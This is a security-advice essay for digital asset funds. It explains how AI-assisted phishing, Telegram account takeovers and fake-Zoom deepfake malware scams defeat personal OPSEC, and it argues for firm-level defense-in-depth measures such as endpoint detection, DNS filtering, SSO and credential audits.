You've been around the digital assets space long enough to be savvy. You've seen people get burned because they were sloppy with a keyphrase. You got SIM-swapped a few years ago: nothing awful happened, but you learned the lesson and have that locked down. You've got YubiKeys on your important wallets and credentials, and you've set up multi-sig where it counts. You run a VPN, have two-factor auth on everything, and use your password manager like a wizard. And you're so good at spotting phishing emails, you're the unofficial firm expert who trains everyone else.
So how did you just get SIM-swapped again?
And how did you miss that the email you just replied to, seemingly from a GP, was actually a phish?
And what about everyone else in your firm whose OPSEC isn't on par with yours?
The current truth is stark: your personal OPSEC (operational security) skills and instincts are quickly losing ground to increasingly sophisticated adversaries. Augmented by AI, the new crop of attacks and social engineering are much harder to detect. Now, it's not a matter of if, but when you'll accidentally click on that link.
State-sponsored groups, organized criminal operations, and social engineering rings stole over $2 billion from the digital asset space in 2025. (That's the disclosed figure – the actual losses are higher.) The firms getting hit did not have zero security. Most had security-conscious individuals like you. What they lacked was a multilayered comprehensive security program, maintained by someone responsible.
Two years of building security programs for digital asset funds has made that gap the thing I'm most focused on: the space between what an individual can do and what a firm actually needs.
The threat environment has changed from a year ago
Not your father's phishing attempts
The phishing attempts of the past were pretty easy to spot once you learned the patterns. Today's phishing and Business Email Compromise attacks can fool even the savviest: attackers construct messages from scraped websites, LinkedIn data, public filings, and blockchain analytics, then refine them with AI to match the tone and communication style of people you actually work with. I've seen emails that seemed to come from colleagues, with forward threads simulating convincing conversations with your colleagues or superiors. When an EA gets an email from 'their manager' saying: "Pay this training invoice for $10k please, it's past due" it's much harder to spot.
The Telegram Jungle
For Digital Asset firms the attack vectors go far beyond email. We live on Telegram, but Telegram is a war zone. There's no identity verification, spam and fake accounts are rampant, and most people haven't taken precautions to secure their accounts. So account takeovers are constant, and in the pressure of the moment even the most security-conscious of us can falter.
Example: You get a Telegram message from a fund manager or investor you've been hoping to talk to for months inviting you to a Zoom, you jump at the chance. The invite looks normal, legitimate. When you join the zoom you see your contact on the video, but they're gesturing they can't hear you, and you get a Zoom pop-up saying you must upgrade your audio drivers. Your important contact is waiting right there, you don't want to waste their time, so you just accept the pop-up or run the suggested commands. Congratulations! You've just installed sophisticated malware.
Let's break down what happened here:
- Your contact got their Telegram account taken over due to weak security
- You trusted they were who they seemed to be and did not confirm the Zoom invite through a different channel
- The call wasn't Zoom but an elaborate fake copied Zoom UI, designed to trick you into installing malware. And the video of your contact? That wasn't them - it was deepfake video the attackers created.
- The 'Zoom upgrade' commands you entered installed sophisticated malware designed to steal passwords and hack crypto wallets.
Similar attacks are rampant in the crypto sector right now. How do you protect against this?
You or someone in your firm will eventually be fooled. The attacks are now good enough that you must bake this into your planning. The real question for your firm is: do you have security layers in place to protect against what individual OPSEC will miss? If not, that breach could be existential.
What personal OPSEC was built to do
The security skills and instincts you've built are all genuinely valuable. They raise the cost of certain attacks and close real vulnerabilities. But their effectiveness is fading in the face of these new threats. And even then, they were designed to protect an individual operating largely on their own.
Running a fund is different. You have shared systems – exchange accounts, custodians, cloud infrastructure, internal tools – with access distributed across a team. People join and leave. Contractors come in for projects and wrap up. Devices that may or may not meet any baseline security standard connect to trading infrastructure. The credential surface expands and contracts in ways that nobody is tracking in real time, because in a lean fund, that's nobody's job.
Personal OPSEC operates on the assumption that you'll catch the threat before it reaches the system. Firm-level security operates on the assumption that sometimes you won't – and builds layers that protect you anyway.
Defense-in-depth
Defense in depth is a strategy that leverages multiple security measures to protect an organization's assets. The thinking is that if one line of defense is compromised, additional layers exist as a backup to ensure that threats are stopped along the way. Defense in depth addresses the security vulnerabilities inherent not only with hardware and software but also with people, as negligence or human error are often the cause of a security breach.
This is the concept most security-aware fund operators are missing, because it requires having run an actual security program rather than a series of individual security decisions. What are some of the layers?
Endpoint detection and response. Think of this as Antivirus on steroids. When a device gets compromised – through a convincing Zoom call that ends with a terminal command, a malicious download, a link that caught someone at a tired moment – the window between initial infection and the malware establishing persistent access is short. EDR software monitors device behavior in real time, looking for odd behavior: writing executables to system directories, making unusual outbound connections, reaching into password stores. EDR flags those signals and kills the malware, and alerts you so you can take appropriate action. Without it, the first sign of a compromise is whatever the malware does after it's had time to settle in. Most BYOD fund environments have no endpoint detection at all.
Network-level filtering. Every internet connection starts with a DNS lookup. Routing that through a security gateway blocks known malicious and command-and-control domains before a connection is ever made – stopping a significant share of attack payloads at the network layer, before they reach the user, regardless of whether the user recognized the threat. A consumer VPN does not reliably do this. Most handle DNS inconsistently, in ways that vary by operating system and network and are invisible to the user. The protection that feels like it's there often isn't, on any given connection.
Browser isolation. For the highest-risk browsing – counterparty due diligence, following links from Telegram, anything involving unknown sources – running the browser session in an isolated environment means that whatever lands on the page can't reach the underlying device. The session is disposable. The device isn't.
Identity infrastructure. A real identity provider, with every SaaS system gated through SSO, means access is granted and revoked in one place. When someone leaves, you disable their account in the IDP and they're out of everything – exchanges, cloud infrastructure, internal tools, all of it – rather than having to remember which systems they had access to and chase each one down manually. Onboarding works the same way in reverse. Without this, the credential surface of a firm that's been operating for a few years is almost certainly larger than anyone can accurately account for.
Credential surface audit. Even with good identity infrastructure going forward, most firms have years of accumulated access that predates it. Former employees often retain live API keys to exchanges; contractors leave behind admin access that outlasted their projects; shared accounts accumulate passwords that multiple people know and nobody owns. Getting a current, accurate picture of who has access to what – and then closing the gaps – is unglamorous work. It's also where a significant share of low-effort attacks find their entry point.
Communication channel protocols. Telegram is the primary communication channel for much of the crypto industry and its primary attack surface. When an account gets compromised, an attacker gains access to months of organizational context – enough to make the impersonation attacks that follow genuinely hard to detect in the moment. Strong second-factor authentication on every account, hardened specifically against SIM-swap, is a firm-level decision. So is having an explicit protocol – not a norm, a protocol – for verifying identity before any sensitive action, in an environment where real-time deepfake calls are an active vector.
Why most firms don't have this in place
None of these layers are exotic or particularly expensive relative to what they protect. And you're probably familiar with most of these concepts at some level. But building and maintaining these layers requires someone to own the whole picture, and in a lean fund, that's nobody's job.
Security decisions get made in response to moments of concern. Something happens in the industry, or someone reads about a new attack, and a decision gets made. Each decision is reasonable. Nobody reviews whether it still holds six months later. Nobody notices what's missing from the overall posture. Nobody owns the program to evolve it in response to the threats.
The result is a firm where the security-aware people have done the personal OPSEC work, and the firm-level infrastructure either doesn't exist or was set up once and never maintained. That gap was exploitable before the current wave of attacks. It's more exploitable now.
Closing it doesn't require a full-time hire. It requires someone senior enough to see the whole picture and accountable enough to keep it current – someone who reviews access on a regular cadence, responds when something flags, and updates the program as the threat environment changes.
The attacks have gotten good enough to treat individual vigilance as a solved problem – something to route around rather than overcome. The structural layers are what contain the damage when that happens. For most funds, building them is still nobody's job.